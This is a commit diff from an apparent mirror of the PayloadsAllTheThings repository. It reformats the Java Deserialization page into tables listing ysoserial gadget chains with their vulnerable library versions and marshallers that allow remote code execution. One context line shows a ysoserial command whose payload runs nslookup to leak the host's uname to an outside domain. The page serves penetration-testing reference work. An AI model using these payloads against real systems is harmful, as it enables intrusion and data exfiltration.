mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2025-12-30 14:40:28 -08:00
Normalize page header for GraphQL, Deserialization, SCM
This commit is contained in:
Swissky
@@ -1,5 +1,8 @@
|
||||
# Java Deserialization
|
||||
|
||||
> Java serialization is the process of converting a Java object’s state into a byte stream, which can be stored or transmitted and later reconstructed (deserialized) back into the original object. Serialization in Java is primarily done using the `Serializable` interface, which marks a class as serializable, allowing it to be saved to files, sent over a network, or transferred between JVMs.
|
||||
|
||||
|
||||
## Summary
|
||||
|
||||
* [Detection](#detection)
|
||||
@@ -19,6 +22,7 @@
|
||||
- Content-type = "application/x-java-serialized-object"
|
||||
- `"H4sIAAAAAAAAAJ"` in gzip(base64)
|
||||
|
||||
|
||||
## Tools
|
||||
|
||||
### Ysoserial
|
||||
@@ -33,44 +37,44 @@ java -jar ysoserial.jar Jdk7u21 bash -c 'nslookup `uname`.[redacted]' | gzip | b
|
||||
```
|
||||
|
||||
**List of payloads included in ysoserial:**
|
||||
```ps1
|
||||
Payload Authors Dependencies
|
||||
------- ------- ------------
|
||||
AspectJWeaver @Jang aspectjweaver:1.9.2, commons-collections:3.2.2
|
||||
BeanShell1 @pwntester, @cschneider4711 bsh:2.0b5
|
||||
C3P0 @mbechler c3p0:0.9.5.2, mchange-commons-java:0.2.11
|
||||
Click1 @artsploit click-nodeps:2.3.0, javax.servlet-api:3.1.0
|
||||
Clojure @JackOfMostTrades clojure:1.8.0
|
||||
CommonsBeanutils1 @frohoff commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2
|
||||
CommonsCollections1 @frohoff commons-collections:3.1
|
||||
CommonsCollections2 @frohoff commons-collections4:4.0
|
||||
CommonsCollections3 @frohoff commons-collections:3.1
|
||||
CommonsCollections4 @frohoff commons-collections4:4.0
|
||||
CommonsCollections5 @matthias_kaiser, @jasinner commons-collections:3.1
|
||||
CommonsCollections6 @matthias_kaiser commons-collections:3.1
|
||||
CommonsCollections7 @scristalli, @hanyrax, @EdoardoVignati commons-collections:3.1
|
||||
FileUpload1 @mbechler commons-fileupload:1.3.1, commons-io:2.4
|
||||
Groovy1 @frohoff groovy:2.3.9
|
||||
Hibernate1 @mbechler
|
||||
Hibernate2 @mbechler
|
||||
JBossInterceptors1 @matthias_kaiser javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
|
||||
JRMPClient @mbechler
|
||||
JRMPListener @mbechler
|
||||
JSON1 @mbechler json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1
|
||||
JavassistWeld1 @matthias_kaiser javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21
|
||||
Jdk7u21 @frohoff
|
||||
Jython1 @pwntester, @cschneider4711 jython-standalone:2.5.2
|
||||
MozillaRhino1 @matthias_kaiser js:1.7R2
|
||||
MozillaRhino2 @_tint0 js:1.7R2
|
||||
Myfaces1 @mbechler
|
||||
Myfaces2 @mbechler
|
||||
ROME @mbechler rome:1.0
|
||||
Spring1 @frohoff spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE
|
||||
Spring2 @mbechler spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2
|
||||
URLDNS @gebl
|
||||
Vaadin1 @kai_ullrich vaadin-server:7.7.14, vaadin-shared:7.7.14
|
||||
Wicket1 @jacob-baines wicket-util:6.23.0, slf4j-api:1.6.4
|
||||
```
|
||||
|
||||
| Payload | Authors | Dependencies |
|
||||
| ------------------- | -------------------------------------- | --- |
|
||||
| AspectJWeaver | @Jang | aspectjweaver:1.9.2, commons-collections:3.2.2 |
|
||||
| BeanShell1 | @pwntester, @cschneider4711 | bsh:2.0b5 |
|
||||
| C3P0 | @mbechler | c3p0:0.9.5.2, mchange-commons-java:0.2.11 |
|
||||
| Click1 | @artsploit | click-nodeps:2.3.0, javax.servlet-api:3.1.0 |
|
||||
| Clojure | @JackOfMostTrades | clojure:1.8.0 |
|
||||
| CommonsBeanutils1 | @frohoff | commons-beanutils:1.9.2, commons-collections:3.1, commons-logging:1.2 |
|
||||
| CommonsCollections1 | @frohoff | commons-collections:3.1 |
|
||||
| CommonsCollections2 | @frohoff | commons-collections4:4.0 |
|
||||
| CommonsCollections3 | @frohoff | commons-collections:3.1 |
|
||||
| CommonsCollections4 | @frohoff | commons-collections4:4.0 |
|
||||
| CommonsCollections5 | @matthias_kaiser, @jasinner | commons-collections:3.1 |
|
||||
| CommonsCollections6 | @matthias_kaiser | commons-collections:3.1 |
|
||||
| CommonsCollections7 | @scristalli, @hanyrax, @EdoardoVignati | commons-collections:3.1 |
|
||||
| FileUpload1 | @mbechler | commons-fileupload:1.3.1, commons-io:2.4|
|
||||
| Groovy1 | @frohoff | groovy:2.3.9 |
|
||||
| Hibernate1 | @mbechler | |
|
||||
| Hibernate2 | @mbechler | |
|
||||
| JBossInterceptors1 | @matthias_kaiser | javassist:3.12.1.GA, jboss-interceptor-core:2.0.0.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 |
|
||||
| JRMPClient | @mbechler | |
|
||||
| JRMPListener | @mbechler | |
|
||||
| JSON1 | @mbechler | json-lib:jar:jdk15:2.4, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2, commons-lang:2.6, ezmorph:1.0.6, commons-beanutils:1.9.2, spring-core:4.1.4.RELEASE, commons-collections:3.1 |
|
||||
| JavassistWeld1 | @matthias_kaiser | javassist:3.12.1.GA, weld-core:1.1.33.Final, cdi-api:1.0-SP1, javax.interceptor-api:3.1, jboss-interceptor-spi:2.0.0.Final, slf4j-api:1.7.21 |
|
||||
| Jdk7u21 | @frohoff | |
|
||||
| Jython1 | @pwntester, @cschneider4711 | jython-standalone:2.5.2 |
|
||||
| MozillaRhino1 | @matthias_kaiser | js:1.7R2 |
|
||||
| MozillaRhino2 | @_tint0 | js:1.7R2 |
|
||||
| Myfaces1 | @mbechler | |
|
||||
| Myfaces2 | @mbechler | |
|
||||
| ROME | @mbechler | rome:1.0 |
|
||||
| Spring1 | @frohoff | spring-core:4.1.4.RELEASE, spring-beans:4.1.4.RELEASE |
|
||||
| Spring2 | @mbechler | spring-core:4.1.4.RELEASE, spring-aop:4.1.4.RELEASE, aopalliance:1.0, commons-logging:1.2 |
|
||||
| URLDNS | @gebl | |
|
||||
| Vaadin1 | @kai_ullrich | vaadin-server:7.7.14, vaadin-shared:7.7.14 |
|
||||
| Wicket1 | @jacob-baines | wicket-util:6.23.0, slf4j-api:1.6.4 |
|
||||
|
||||
|
||||
### Burp extensions
|
||||
|
||||
@@ -108,23 +112,23 @@ Wicket1 @jacob-baines wicket-util:6.23.0, s
|
||||
// arguments - Gadget specific arguments
|
||||
```
|
||||
|
||||
Payload generators for the following marshallers are included:<br />
|
||||
Payload generators for the following marshallers are included:
|
||||
|
||||
| Marshaller | Gadget Impact
|
||||
| ------------------------------- | ----------------------------------------------
|
||||
| BlazeDSAMF(0|3|X) | JDK only escalation to Java serialization<br/>various third party libraries RCEs
|
||||
| Hessian|Burlap | various third party RCEs
|
||||
| Castor | dependency library RCE
|
||||
| Jackson | **possible JDK only RCE**, various third party RCEs
|
||||
| Java | yet another third party RCE
|
||||
| JsonIO | **JDK only RCE**
|
||||
| JYAML | **JDK only RCE**
|
||||
| Kryo | third party RCEs
|
||||
| KryoAltStrategy | **JDK only RCE**
|
||||
| Red5AMF(0|3) | **JDK only RCE**
|
||||
| SnakeYAML | **JDK only RCEs**
|
||||
| XStream | **JDK only RCEs**
|
||||
| YAMLBeans | third party RCE
|
||||
| Marshaller | Gadget Impact |
|
||||
| ------------------------------- | ---------------------------------------------- |
|
||||
| BlazeDSAMF(0|3|X) | JDK only escalation to Java serialization various third party libraries RCEs |
|
||||
| Hessian|Burlap | various third party RCEs |
|
||||
| Castor | dependency library RCE |
|
||||
| Jackson | **possible JDK only RCE**, various third party RCEs |
|
||||
| Java | yet another third party RCE |
|
||||
| JsonIO | **JDK only RCE** |
|
||||
| JYAML | **JDK only RCE** |
|
||||
| Kryo | third party RCEs |
|
||||
| KryoAltStrategy | **JDK only RCE** |
|
||||
| Red5AMF(0|3) | **JDK only RCE** |
|
||||
| SnakeYAML | **JDK only RCEs** |
|
||||
| XStream | **JDK only RCEs** |
|
||||
| YAMLBeans | third party RCE |
|
||||
|
||||
|
||||
## References
|
||||
|
||||
Reference in New Issue
Block a user